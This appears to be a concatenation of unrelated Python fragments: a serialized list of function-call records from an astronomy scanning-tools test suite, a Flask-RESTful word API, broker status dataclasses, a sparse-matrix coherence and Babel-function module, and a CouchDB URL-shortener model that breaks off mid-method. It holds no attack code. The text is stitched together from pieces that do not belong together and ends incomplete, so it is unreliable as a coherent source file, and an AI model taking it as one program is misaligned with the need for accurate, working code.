'st.get_engine_rotations', (['time1', 'rpm1', 'zenith_distance1', 'boresight_angle'], {}), '(time1, rpm1, zenith_distance1, boresight_angle)\n', (28680, 28728), True, 'from ScanningTools import ScanningTools as st\n'), ((28758, 28828), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm1', 'zenith_distance', 'boresight_angle'], {}), '(time1, rpm1, zenith_distance, boresight_angle)\n', (28781, 28828), True, 'from ScanningTools import ScanningTools as st\n'), ((28873, 28945), 'ScanningTools.ScanningTools.get_full_fp_polarization_angles', 'st.get_full_fp_polarization_angles', (['"""./ScanningTools/fp_data/fp_psi.txt"""'], {}), "('./ScanningTools/fp_data/fp_psi.txt')\n", (28907, 28945), True, 'from ScanningTools import ScanningTools as st\n'), ((29026, 29120), 
'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp_pol_versors', 'n_horns', 'time'], {'n': 'n', 'cartesian': '(True)'}), '(phi, theta, psi, x_fp_pol_versors, n_horns, time, n=n,\n cartesian=True)\n', (29045, 29120), True, 'from ScanningTools import ScanningTools as st\n'), ((29197, 29297), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp_pol_versors', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(True)'}), '(phi1, theta1, psi1, x_fp_pol_versors, n_horns, time1, n\n =n1, cartesian=True)\n', (29216, 29297), True, 'from ScanningTools import ScanningTools as st\n'), ((29369, 29454), 'ScanningTools.ScanningTools.get_polarization_angles', 'st.get_polarization_angles', (['phi', 'theta', 'psi', 'x_fp_pol_versors', 'n_horns', 'time'], {'n': 'n'}), '(phi, theta, psi, x_fp_pol_versors, n_horns, time,\n n=n)\n', (29395, 29454), True, 'from ScanningTools import ScanningTools as st\n'), ((29525, 29615), 'ScanningTools.ScanningTools.get_polarization_angles', 'st.get_polarization_angles', (['phi1', 'theta1', 'psi1', 'x_fp_pol_versors', 'n_horns', 'time1'], {'n': 'n1'}), '(phi1, theta1, psi1, x_fp_pol_versors, n_horns,\n time1, n=n1)\n', (29551, 29615), True, 'from ScanningTools import ScanningTools as st\n'), ((29687, 29777), 'ScanningTools.ScanningTools.get_polarization_angles', 'st.get_polarization_angles', (['phi2', 'theta2', 'psi2', 'x_fp_pol_versors', 'n_horns', 'time1'], {'n': 'n1'}), '(phi2, theta2, psi2, x_fp_pol_versors, n_horns,\n time1, n=n1)\n', (29713, 29777), True, 'from ScanningTools import ScanningTools as st\n'), ((2514, 2533), 'numpy.radians', 'np.radians', (['ang0[0]'], {}), '(ang0[0])\n', (2524, 2533), True, 'import numpy as np\n'), ((3815, 3851), 'numpy.allclose', 'np.allclose', (['Jul_1_2013', '(2456474.442)'], {}), '(Jul_1_2013, 2456474.442)\n', (3826, 3851), True, 'import numpy as np\n'), ((3877, 3913), 'numpy.allclose', 'np.allclose', 
(['Jun_19_2009', '(2455002.25)'], {}), '(Jun_19_2009, 2455002.25)\n', (3888, 3913), True, 'import numpy as np\n'), ((3927, 3997), 'astropy.time.Time', 'Time', (["['2015-1-1 00:00:10', '2018-1-3 5:15:24.3', '1980-4-22 19:30:2']"], {}), "(['2015-1-1 00:00:10', '2018-1-3 5:15:24.3', '1980-4-22 19:30:2'])\n", (3931, 3997), False, 'from astropy.time import Time\n'), ((4304, 4321), 'numpy.allclose', 'np.allclose', (['t', 'T'], {}), '(t, T)\n', (4315, 4321), True, 'import numpy as np\n'), ((4956, 4984), 'ScanningTools.ScanningTools.get_nside_eff', 'st.get_nside_eff', (['fwhm_beam0'], {}), '(fwhm_beam0)\n', (4972, 4984), True, 'from ScanningTools import ScanningTools as st\n'), ((5017, 5045), 'ScanningTools.ScanningTools.get_nside_eff', 'st.get_nside_eff', (['fwhm_beam1'], {}), '(fwhm_beam1)\n', (5033, 5045), True, 'from ScanningTools import ScanningTools as st\n'), ((5077, 5105), 'ScanningTools.ScanningTools.get_nside_eff', 'st.get_nside_eff', (['fwhm_beam2'], {}), '(fwhm_beam2)\n', (5093, 5105), True, 'from ScanningTools import ScanningTools as st\n'), ((9017, 9110), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'None'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=None)\n', (9030, 9110), True, 'from ScanningTools import ScanningTools as st\n'), ((17563, 17582), 'numpy.allclose', 'np.allclose', (['m3', 'M3'], {}), '(m3, M3)\n', (17574, 17582), True, 'import numpy as np\n'), ((18098, 18136), 'numpy.allclose', 'np.allclose', (['(theta[1:] - theta[:-1])', '(0)'], {}), '(theta[1:] - theta[:-1], 0)\n', (18109, 18136), True, 'import numpy as np\n'), ((18162, 18196), 'numpy.allclose', 'np.allclose', (['(psi[1:] - psi[:-1])', '(0)'], {}), '(psi[1:] - psi[:-1], 0)\n', (18173, 18196), True, 'import numpy as np\n'), ((24586, 24613), 'numpy.allclose', 'np.allclose', (['Dec1', 'Dec3[n1]'], {}), '(Dec1, Dec3[n1])\n', (24597, 24613), True, 'import 
numpy as np\n'), ((24639, 24664), 'numpy.allclose', 'np.allclose', (['Ra1', 'Ra3[n1]'], {}), '(Ra1, Ra3[n1])\n', (24650, 24664), True, 'import numpy as np\n'), ((24937, 24966), 'numpy.allclose', 'np.allclose', (['Dec1[0]', 'Dec5[0]'], {}), '(Dec1[0], Dec5[0])\n', (24948, 24966), True, 'import numpy as np\n'), ((24992, 25019), 'numpy.allclose', 'np.allclose', (['Ra1[0]', 'Ra5[0]'], {}), '(Ra1[0], Ra5[0])\n', (25003, 25019), True, 'import numpy as np\n'), ((25046, 25077), 'numpy.allclose', 'np.allclose', (['Dec1[1:]', 'Dec5[1:]'], {}), '(Dec1[1:], Dec5[1:])\n', (25057, 25077), True, 'import numpy as np\n'), ((25104, 25133), 'numpy.allclose', 'np.allclose', (['Ra1[1:]', 'Ra5[1:]'], {}), '(Ra1[1:], Ra5[1:])\n', (25115, 25133), True, 'import numpy as np\n'), ((25199, 25223), 'astropy.coordinates.SkyCoord.from_name', 'SkyCoord.from_name', (['name'], {}), '(name)\n', (25217, 25223), False, 'from astropy.coordinates import SkyCoord, AltAz\n'), ((25449, 25505), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'object_Alt', 'object_Az'], {}), '(JD1, loc, object_Alt, object_Az)\n', (25472, 25505), True, 'from ScanningTools import ScanningTools as st\n'), ((30192, 30243), 'numpy.allclose', 'np.allclose', (['pol_ang_proj2[..., 0]', 'x_fp_pol_angles'], {}), '(pol_ang_proj2[..., 0], x_fp_pol_angles)\n', (30203, 30243), True, 'import numpy as np\n'), ((30281, 30329), 'numpy.allclose', 'np.allclose', (['pol_ang_proj', 'pol_ang_proj_expected'], {}), '(pol_ang_proj, pol_ang_proj_expected)\n', (30292, 30329), True, 'import numpy as np\n'), ((2367, 2425), 'numpy.array', 'np.array', (['[-10.76638889, 30.5875, -180.422222, 3.06805556]'], {}), '([-10.76638889, 30.5875, -180.422222, 3.06805556])\n', (2375, 2425), True, 'import numpy as np\n'), ((2673, 2740), 'numpy.array', 'np.array', (['[[1, 32, 47.706], [-0, 33, 36], [0, 20, 0], [-1, 0, 3.6]]'], {}), '([[1, 32, 47.706], [-0, 33, 36], [0, 20, 0], [-1, 0, 3.6]])\n', (2681, 2740), True, 'import 
numpy as np\n'), ((2834, 2859), 'numpy.array', 'np.array', (['[1, 32, 47.706]'], {}), '([1, 32, 47.706])\n', (2842, 2859), True, 'import numpy as np\n'), ((4023, 4090), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(0, 0, 10)', '(1, 1, 2015)'], {'UTC': '(0)', 'DST': '(0)'}), '((0, 0, 10), (1, 1, 2015), UTC=0, DST=0)\n', (4050, 4090), True, 'from ScanningTools import ScanningTools as st\n'), ((4114, 4184), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(5, 15, 24.3)', '(3, 1, 2018)'], {'UTC': '(0)', 'DST': '(0)'}), '((5, 15, 24.3), (3, 1, 2018), UTC=0, DST=0)\n', (4141, 4184), True, 'from ScanningTools import ScanningTools as st\n'), ((4208, 4277), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(19, 30, 2)', '(22, 4, 1980)'], {'UTC': '(0)', 'DST': '(0)'}), '((19, 30, 2), (22, 4, 1980), UTC=0, DST=0)\n', (4235, 4277), True, 'from ScanningTools import ScanningTools as st\n'), ((4682, 4708), 'numpy.array', 'np.array', (['[11, 52, 46.843]'], {}), '([11, 52, 46.843])\n', (4690, 4708), True, 'import numpy as np\n'), ((5229, 5264), 'numpy.allclose', 'np.allclose', (['x_fp[i, 0]', 'x_fp[j, 0]'], {}), '(x_fp[i, 0], x_fp[j, 0])\n', (5240, 5264), True, 'import numpy as np\n'), ((5294, 5330), 'numpy.allclose', 'np.allclose', (['x_fp[i, 1]', '(-x_fp[j, 1])'], {}), '(x_fp[i, 1], -x_fp[j, 1])\n', (5305, 5330), True, 'import numpy as np\n'), ((5360, 5395), 'numpy.allclose', 'np.allclose', (['x_fp[i, 2]', 'x_fp[j, 2]'], {}), '(x_fp[i, 2], x_fp[j, 2])\n', (5371, 5395), True, 'import numpy as np\n'), ((5602, 5627), 'numpy.sum', 'np.sum', (['(x_fp ** 2)'], {'axis': '(1)'}), '(x_fp ** 2, axis=1)\n', (5608, 5627), True, 'import numpy as np\n'), ((6549, 6584), 'numpy.allclose', 'np.allclose', (['x_fp[i, 0]', 'x_fp[j, 0]'], {}), '(x_fp[i, 0], x_fp[j, 0])\n', (6560, 6584), True, 'import numpy as np\n'), ((6614, 6650), 'numpy.allclose', 'np.allclose', (['x_fp[i, 
1]', '(-x_fp[j, 1])'], {}), '(x_fp[i, 1], -x_fp[j, 1])\n', (6625, 6650), True, 'import numpy as np\n'), ((6680, 6715), 'numpy.allclose', 'np.allclose', (['x_fp[i, 2]', 'x_fp[j, 2]'], {}), '(x_fp[i, 2], x_fp[j, 2])\n', (6691, 6715), True, 'import numpy as np\n'), ((6892, 6932), 'numpy.sum', 'np.sum', (['(polarization_versor ** 2)'], {'axis': '(1)'}), '(polarization_versor ** 2, axis=1)\n', (6898, 6932), True, 'import numpy as np\n'), ((8261, 8314), 'numpy.allclose', 'np.allclose', (['(time[1:] - time[0:-1])', '(1 / sampling_rate)'], {}), '(time[1:] - time[0:-1], 1 / sampling_rate)\n', (8272, 8314), True, 'import numpy as np\n'), ((8451, 8508), 'numpy.allclose', 'np.allclose', (['(t1 - t0).sec', '(1 / sampling_rate)'], {'rtol': '(0.001)'}), '((t1 - t0).sec, 1 / sampling_rate, rtol=0.001)\n', (8462, 8508), True, 'import numpy as np\n'), ((14255, 14328), 'numpy.sum', 'np.sum', (['(np.r_[True, phi[1:] > phi[:-1]] & np.r_[phi[:-1] > phi[1:], True])'], {}), '(np.r_[True, phi[1:] > phi[:-1]] & np.r_[phi[:-1] > phi[1:], True])\n', (14261, 14328), True, 'import numpy as np\n'), ((17423, 17458), 'numpy.repeat', 'np.repeat', (['M1[None, ...]', '(3)'], {'axis': '(0)'}), '(M1[None, ...], 3, axis=0)\n', (17432, 17458), True, 'import numpy as np\n'), ((17501, 17536), 'numpy.repeat', 'np.repeat', (['M2[None, ...]', '(3)'], {'axis': '(0)'}), '(M2[None, ...], 3, axis=0)\n', (17510, 17536), True, 'import numpy as np\n'), ((20444, 20472), 'numpy.dot', 'np.dot', (['fp_rot1[i]', 'x_fp[n1]'], {}), '(fp_rot1[i], x_fp[n1])\n', (20450, 20472), True, 'import numpy as np\n'), ((20897, 20924), 'numpy.dot', 'np.dot', (['fp_rot2[j]', 'x_fp[p]'], {}), '(fp_rot2[j], x_fp[p])\n', (20903, 20924), True, 'import numpy as np\n'), ((25534, 25573), 'numpy.allclose', 'np.allclose', (['object.dec.rad', 'object_Dec'], {}), '(object.dec.rad, object_Dec)\n', (25545, 25573), True, 'import numpy as np\n'), ((25603, 25640), 'numpy.allclose', 'np.allclose', (['object.ra.rad', 'object_Ra'], {}), '(object.ra.rad, 
object_Ra)\n', (25614, 25640), True, 'import numpy as np\n'), ((29886, 29938), 'numpy.linspace', 'np.linspace', (['(0)', 'np.pi', '(sampling_rate * obs_t / 2 + 1)'], {}), '(0, np.pi, sampling_rate * obs_t / 2 + 1)\n', (29897, 29938), True, 'import numpy as np\n'), ((30050, 30112), 'numpy.arctan2', 'np.arctan2', (['x_fp_pol_versors[..., 1]', 'x_fp_pol_versors[..., 0]'], {}), '(x_fp_pol_versors[..., 1], x_fp_pol_versors[..., 0])\n', (30060, 30112), True, 'import numpy as np\n'), ((30765, 30797), 'numpy.allclose', 'np.allclose', (['x_fp.shape', '(49, 3)'], {}), '(x_fp.shape, (49, 3))\n', (30776, 30797), True, 'import numpy as np\n'), ((30827, 30865), 'numpy.allclose', 'np.allclose', (['x_fp_pol_angles.shape', '(49)'], {}), '(x_fp_pol_angles.shape, 49)\n', (30838, 30865), True, 'import numpy as np\n'), ((30937, 30970), 'numpy.allclose', 'np.allclose', (['time.shape', 'JD.shape'], {}), '(time.shape, JD.shape)\n', (30948, 30970), True, 'import numpy as np\n'), ((31000, 31034), 'numpy.allclose', 'np.allclose', (['theta.shape', 'JD.shape'], {}), '(theta.shape, JD.shape)\n', (31011, 31034), True, 'import numpy as np\n'), ((31064, 31099), 'numpy.allclose', 'np.allclose', (['theta.shape', 'phi.shape'], {}), '(theta.shape, phi.shape)\n', (31075, 31099), True, 'import numpy as np\n'), ((31129, 31162), 'numpy.allclose', 'np.allclose', (['psi.shape', 'phi.shape'], {}), '(psi.shape, phi.shape)\n', (31140, 31162), True, 'import numpy as np\n'), ((31192, 31248), 'numpy.allclose', 'np.allclose', (['psi.shape', 'fp_pointings_spherical.shape[-2]'], {}), '(psi.shape, fp_pointings_spherical.shape[-2])\n', (31203, 31248), True, 'import numpy as np\n'), ((31278, 31335), 'numpy.allclose', 'np.allclose', (['Alt.shape', 'fp_pointings_spherical.shape[:-1]'], {}), '(Alt.shape, fp_pointings_spherical.shape[:-1])\n', (31289, 31335), True, 'import numpy as np\n'), ((31365, 31397), 'numpy.allclose', 'np.allclose', (['Alt.shape', 'Az.shape'], {}), '(Alt.shape, Az.shape)\n', (31376, 31397), True, 
'import numpy as np\n'), ((31427, 31459), 'numpy.allclose', 'np.allclose', (['Dec.shape', 'Az.shape'], {}), '(Dec.shape, Az.shape)\n', (31438, 31459), True, 'import numpy as np\n'), ((31489, 31521), 'numpy.allclose', 'np.allclose', (['Dec.shape', 'Ra.shape'], {}), '(Dec.shape, Ra.shape)\n', (31500, 31521), True, 'import numpy as np\n'), ((31551, 31599), 'numpy.allclose', 'np.allclose', (['polarization_angles.shape', 'Ra.shape'], {}), '(polarization_angles.shape, Ra.shape)\n', (31562, 31599), True, 'import numpy as np\n'), ((31629, 31666), 'numpy.allclose', 'np.allclose', (['time.shape', 'Ra.shape[-1]'], {}), '(time.shape, Ra.shape[-1])\n', (31640, 31666), True, 'import numpy as np\n'), ((31696, 31753), 'numpy.allclose', 'np.allclose', (['fp_pointings_spherical.shape[-2]', 'time.shape'], {}), '(fp_pointings_spherical.shape[-2], time.shape)\n', (31707, 31753), True, 'import numpy as np\n'), ((32176, 32198), 'numpy.array', 'np.array', (['[28, 16, 24]'], {}), '([28, 16, 24])\n', (32184, 32198), True, 'import numpy as np\n'), ((32217, 32240), 'numpy.array', 'np.array', (['[-16, 38, 32]'], {}), '([-16, 38, 32])\n', (32225, 32240), True, 'import numpy as np\n'), ((32667, 32689), 'numpy.array', 'np.array', (['[28, 16, 24]'], {}), '([28, 16, 24])\n', (32675, 32689), True, 'import numpy as np\n'), ((32708, 32731), 'numpy.array', 'np.array', (['[-16, 38, 32]'], {}), '([-16, 38, 32])\n', (32716, 32731), True, 'import numpy as np\n'), ((3435, 3452), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['hours'], {}), '(hours)\n', (3445, 3452), True, 'from ScanningTools import ScanningTools as st\n'), ((8401, 8417), 'numpy.diff', 'np.diff', (['JD_step'], {}), '(JD_step)\n', (8408, 8417), True, 'import numpy as np\n'), ((18339, 18379), 'numpy.diff', 'np.diff', (['fp_pointings_c[..., 2]'], {'axis': '(-1)'}), '(fp_pointings_c[..., 2], axis=-1)\n', (18346, 18379), True, 'import numpy as np\n'), ((18575, 18611), 'numpy.sum', 'np.sum', (['(fp_pointings_c ** 2)'], {'axis': '(-1)'}), 
'(fp_pointings_c ** 2, axis=-1)\n', (18581, 18611), True, 'import numpy as np\n'), ((26032, 26048), 'numpy.abs', 'np.abs', (['(Ra - PRa)'], {}), '(Ra - PRa)\n', (26038, 26048), True, 'import numpy as np\n'), ((29952, 30005), 'numpy.linspace', 'np.linspace', (['(-np.pi)', '(0)', '(sampling_rate * obs_t / 2 + 1)'], {}), '(-np.pi, 0, sampling_rate * obs_t / 2 + 1)\n', (29963, 30005), True, 'import numpy as np\n'), ((3065, 3083), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['angles'], {}), '(angles)\n', (3075, 3083), True, 'from ScanningTools import ScanningTools as st\n'), ((3134, 3152), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['angles'], {}), '(angles)\n', (3144, 3152), True, 'from ScanningTools import ScanningTools as st\n'), ((3364, 3384), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['hours[1]'], {}), '(hours[1])\n', (3374, 3384), True, 'from ScanningTools import ScanningTools as st\n'), ((25285, 25306), 'astropy.time.Time', 'Time', (['JD'], {'format': '"""jd"""'}), "(JD, format='jd')\n", (25289, 25306), False, 'from astropy.time import Time\n'), ((18413, 18445), 'numpy.degrees', 'np.degrees', (['fp_pointings[..., 0]'], {}), '(fp_pointings[..., 0])\n', (18423, 18445), True, 'import numpy as np\n'), ((18488, 18520), 'numpy.degrees', 'np.degrees', (['fp_pointings[..., 1]'], {}), '(fp_pointings[..., 1])\n', (18498, 18520), True, 'import numpy as np\n'), ((25971, 25989), 'numpy.abs', 'np.abs', (['(Dec - PDec)'], {}), '(Dec - PDec)\n', (25977, 25989), True, 'import numpy as np\n'), ((27792, 27821), 'numpy.max', 'np.max', (['pol_ang_proj'], {'axis': '(-1)'}), '(pol_ang_proj, axis=-1)\n', (27798, 27821), True, 'import numpy as np\n'), ((27868, 27897), 'numpy.min', 'np.min', (['pol_ang_proj'], {'axis': '(-1)'}), '(pol_ang_proj, axis=-1)\n', (27874, 27897), True, 'import numpy as np\n')] |
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
from models.word import WordModel
class Word(Resource):
    """RESTful resource for a single word, addressed by its text value.

    The URL routing is expected to map a ``<word_value>`` path segment onto
    these handlers.  JWT authentication is currently disabled (the
    ``@jwt_required()`` decorators are commented out).
    """

    # Shared request parser for POST/PUT: every word must reference a stem.
    parser = reqparse.RequestParser()
    parser.add_argument('stem_id',
        type=int,
        required=True,
        help="Every word needs a stem."
    )

    #@jwt_required()
    def get(self, word_value):
        """Return the word as JSON, or a 404 payload when it does not exist."""
        word = WordModel.find_by_word(word_value)
        if word:
            return word.json()
        return {'message': 'Word not found'}, 404

    #@jwt_required()
    def post(self, word_value):
        """Create a new word.

        Returns 400 if the word already exists, 500 on a database failure,
        otherwise the created word with status 201.
        """
        if WordModel.find_by_word(word_value):
            return {'message': "An word with name '{}' already exists.".format(word_value)}, 400

        data = Word.parser.parse_args()

        word = WordModel(word_value, **data)
        try:
            word.save_to_db()
        # Was a bare `except:`; never swallow SystemExit/KeyboardInterrupt.
        except Exception:
            return {"message": "An error occurred inserting the word."}, 500

        return word.json(), 201

    #@jwt_required()
    def delete(self, word_value):
        """Delete the word if present; 404 when there is nothing to delete."""
        word = WordModel.find_by_word(word_value)
        if word:
            word.delete_from_db()
            return {'message': 'word deleted'}
        # Previously this endpoint reported success even when no row existed.
        return {'message': 'Word not found'}, 404

    #@jwt_required()
    def put(self, word_value):
        """Create the word if missing, otherwise update its stem reference."""
        data = Word.parser.parse_args()

        word = WordModel.find_by_word(word_value)
        if word is None:
            word = WordModel(word_value, **data)
        else:
            word.stem_id = data['stem_id']

        # Keep the stored text in sync with the URL segment in both branches.
        word.text = word_value
        word.save_to_db()

        return word.json()
class WordList(Resource):
    """Read-only resource returning the full collection of words."""

    #@jwt_required()
    def get(self):
        """List every stored word as a JSON payload."""
        all_words = WordModel.query.all()  # TODO: pagination
        return {'words': [word.json() for word in all_words]}
| [
"models.word.WordModel",
"models.word.WordModel.find_by_word",
"flask_restful.reqparse.RequestParser",
"models.word.WordModel.query.all"
] | [((150, 174), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (172, 174), False, 'from flask_restful import Resource, reqparse\n'), ((365, 399), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (387, 399), False, 'from models.word import WordModel\n'), ((563, 597), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (585, 597), False, 'from models.word import WordModel\n'), ((753, 782), 'models.word.WordModel', 'WordModel', (['word_value'], {}), '(word_value, **data)\n', (762, 782), False, 'from models.word import WordModel\n'), ((1024, 1058), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (1046, 1058), False, 'from models.word import WordModel\n'), ((1263, 1297), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (1285, 1297), False, 'from models.word import WordModel\n'), ((1343, 1372), 'models.word.WordModel', 'WordModel', (['word_value'], {}), '(word_value, **data)\n', (1352, 1372), False, 'from models.word import WordModel\n'), ((1632, 1653), 'models.word.WordModel.query.all', 'WordModel.query.all', ([], {}), '()\n', (1651, 1653), False, 'from models.word import WordModel\n')] |
from dataclasses import dataclass
from typing import Dict
from typing import Optional
@dataclass(frozen=True)
class CurrentDestinationStatus:
    """Immutable snapshot of a messaging destination's counters.

    ``number_of_pending_messages`` may be absent (None) while the other
    counters are always reported.
    """

    number_of_pending_messages: Optional[int]
    number_of_consumers: int
    messages_enqueued: int
    messages_dequeued: int
@dataclass(frozen=True)
class ConsumerStatus:
    """Immutable record describing one consumer attached to a destination.

    Most broker-reported counters are optional; only ``destination_name``,
    ``prefetch`` and ``exclusive`` are guaranteed to be present.
    """

    address_to_destination_details: Optional[str]
    destination_name: str
    session_id: Optional[int]
    enqueues: Optional[int]
    dequeues: Optional[int]
    dispatched: Optional[int]
    dispatched_queue: Optional[int]
    prefetch: int
    max_pending: Optional[int]
    exclusive: bool
    retroactive: Optional[bool]
@dataclass(frozen=True)
class MessageStatus:
    """Immutable view of a single message's identity and metadata.

    ``details`` and ``properties`` are free-form dicts as reported by the
    broker; ``correlation_id`` is always present.
    """

    message_id: Optional[str]
    details: Dict
    persistent: Optional[bool]
    correlation_id: str
    properties: Optional[Dict]
@dataclass(frozen=True)
class SubscriberSetup:
    """Immutable record of a subscriber's configuration and queue counters."""

    address_to_subscriber_details: str
    subscriber_id: str
    destination: str
    pending_queue_size: int
    dispatched_queue_size: int
    dispatched_counter: int
    enqueue_counter: int
    dequeue_counter: int
| [
"dataclasses.dataclass"
] | [((89, 111), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (98, 111), False, 'from dataclasses import dataclass\n'), ((276, 298), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (285, 298), False, 'from dataclasses import dataclass\n'), ((653, 675), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (662, 675), False, 'from dataclasses import dataclass\n'), ((834, 856), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (843, 856), False, 'from dataclasses import dataclass\n')] |
r"""
Mutual Coherence and Babel Function are the properties of a matrix, used to
estimate the Spark of a matrix, which in turn is used to determine the
optimality of the solution to :math:`\text{P}_0` problem.
Babel Function gives a tighter bound on the Spark of a matrix.
Spark of a matrix :math:`\boldsymbol{A}` is the size of the smallest subset of
linearly dependent columns of :math:`\boldsymbol{A}`.
.. currentmodule:: sparse.coherence
.. autosummary::
:toctree: toctree/coherence/
mutual_coherence
babel
"""
import math
from collections import namedtuple
import numpy as np
# Result pair returned by both bound estimators.
CoherenceSpark = namedtuple("CoherenceSpark", ("coherence", "spark"))


def mutual_coherence(mat):
    r"""
    Compute the mutual coherence of a matrix and the Spark lower bound it
    implies.

    For an input matrix :math:`\boldsymbol{A}` of size `N` x `M`, the mutual
    coherence is the maximal absolute inner-product between its normalized
    columns; the Spark lower bound is
    :math:`\text{Spark}(\boldsymbol{A}) \ge 1 + 1 / \mu(\boldsymbol{A})`.

    Parameters
    ----------
    mat : (N, M) np.ndarray
        The input matrix :math:`\boldsymbol{A}`.

    Returns
    -------
    CoherenceSpark
        A namedtuple with two attributes:
        `.coherence` - mutual coherence of `mat`;
        `.spark` - Spark lower bound of `mat` (``math.inf`` when the
        columns are mutually orthogonal).
    """
    mat = mat / np.linalg.norm(mat, axis=0)
    gram = np.abs(mat.T.dot(mat))
    # Zero the diagonal so self-products do not dominate the maximum.
    np.fill_diagonal(gram, 0)
    mu = gram.max()
    if mu == 0:
        # Fix: mutually orthogonal columns previously raised
        # ZeroDivisionError here.  The bound 1 + 1/mu diverges, so report
        # an infinite Spark bound instead.
        return CoherenceSpark(0.0, math.inf)
    spark = math.ceil(1 + 1 / mu)
    return CoherenceSpark(mu, spark)


def babel(mat):
    r"""
    Compute the Babel Function values of a matrix and the (tighter) Spark
    lower bound they imply.

    For normalized columns, :math:`\mu_1(k)` is the largest sum of `k`
    absolute inner-products against any fixed column.  If
    :math:`\mu_1(k) > 1` first happens at `k`, then
    :math:`\text{Spark}(\boldsymbol{A}) > k`.

    Parameters
    ----------
    mat : (N, M) np.ndarray
        The input matrix :math:`\boldsymbol{A}`.

    Returns
    -------
    CoherenceSpark
        A `namedtuple` with two attributes:
        `.coherence` - array of `M-1` values :math:`\mu_1(k), k=1..M-1`;
        `.spark` - Spark lower bound of `mat`.  When :math:`\mu_1` never
        exceeds 1 the bound is inconclusive for every subset size, so
        ``M + 1`` is returned (previously this case raised IndexError).
    """
    mat = mat / np.linalg.norm(mat, axis=0)
    gram = np.abs(mat.T.dot(mat))
    # Gram matrix' of L2 normalized matrix entries are in range [0, 1]
    # with 1s on the diagonal
    gram.sort(axis=1)  # sort rows
    gram = gram[:, ::-1]  # in descending order
    gram = gram[:, 1:]  # skip the first column of 1s (diagonal elements)
    gram = gram.cumsum(axis=1)  # cumsum rows
    mu1 = gram.max(axis=0)
    exceeding = np.nonzero(mu1 > 1)[0]
    if exceeding.size == 0:
        # Fix: no mu1(k) exceeds 1, so every subset of columns passes the
        # Babel test and Spark > M; the old code crashed with IndexError.
        spark = mat.shape[1] + 1
    else:
        spark = exceeding[0] + 2
    return CoherenceSpark(mu1, spark)
def _quiz4():
    """Print both bound estimates for the course-quiz 4 x 4 matrix."""
    sample = np.reshape(
        [16, -2, 15, 13, 5, 6, 8, 8, 9, 4, 11, 12, 4, 12, 10, 1], (4, 4)
    )
    print(mutual_coherence(sample))
    print(babel(sample))


if __name__ == '__main__':
    _quiz4()
| [
"collections.namedtuple",
"numpy.reshape",
"math.ceil",
"numpy.fill_diagonal",
"numpy.nonzero",
"numpy.linalg.norm"
] | [((615, 667), 'collections.namedtuple', 'namedtuple', (['"""CoherenceSpark"""', "('coherence', 'spark')"], {}), "('CoherenceSpark', ('coherence', 'spark'))\n", (625, 667), False, 'from collections import namedtuple\n'), ((1712, 1737), 'numpy.fill_diagonal', 'np.fill_diagonal', (['gram', '(0)'], {}), '(gram, 0)\n', (1728, 1737), True, 'import numpy as np\n'), ((1770, 1791), 'math.ceil', 'math.ceil', (['(1 + 1 / mu)'], {}), '(1 + 1 / mu)\n', (1779, 1791), False, 'import math\n'), ((3506, 3582), 'numpy.reshape', 'np.reshape', (['[16, -2, 15, 13, 5, 6, 8, 8, 9, 4, 11, 12, 4, 12, 10, 1]', '(4, 4)'], {}), '([16, -2, 15, 13, 5, 6, 8, 8, 9, 4, 11, 12, 4, 12, 10, 1], (4, 4))\n', (3516, 3582), True, 'import numpy as np\n'), ((1646, 1673), 'numpy.linalg.norm', 'np.linalg.norm', (['mat'], {'axis': '(0)'}), '(mat, axis=0)\n', (1660, 1673), True, 'import numpy as np\n'), ((3007, 3034), 'numpy.linalg.norm', 'np.linalg.norm', (['mat'], {'axis': '(0)'}), '(mat, axis=0)\n', (3021, 3034), True, 'import numpy as np\n'), ((3412, 3431), 'numpy.nonzero', 'np.nonzero', (['(mu1 > 1)'], {}), '(mu1 > 1)\n', (3422, 3431), True, 'import numpy as np\n')] |
from datetime import datetime
from couchdb.mapping import BooleanField
from couchdb.mapping import DateTimeField
from couchdb.mapping import Document
from couchdb.mapping import TextField
from .utils import get_random_uid
from .utils import url_for
class URL(Document):
    """CouchDB document for a shortened URL.

    ``URL.db`` must be set to a couchdb ``Database`` before use.
    """

    target = TextField()     # the long URL this short link resolves to
    public = BooleanField()  # whether the link appears in public listings
    # Fix: pass the callable, not its result.  ``datetime.utcnow()`` was
    # evaluated once at import time, stamping the same frozen timestamp on
    # every document; couchdb calls a callable default per new document.
    added = DateTimeField(default=datetime.utcnow)
    shorty_id = TextField(default=None)

    db = None

    @classmethod
    def load(cls, id):
        """Load the document with the given id from the bound database."""
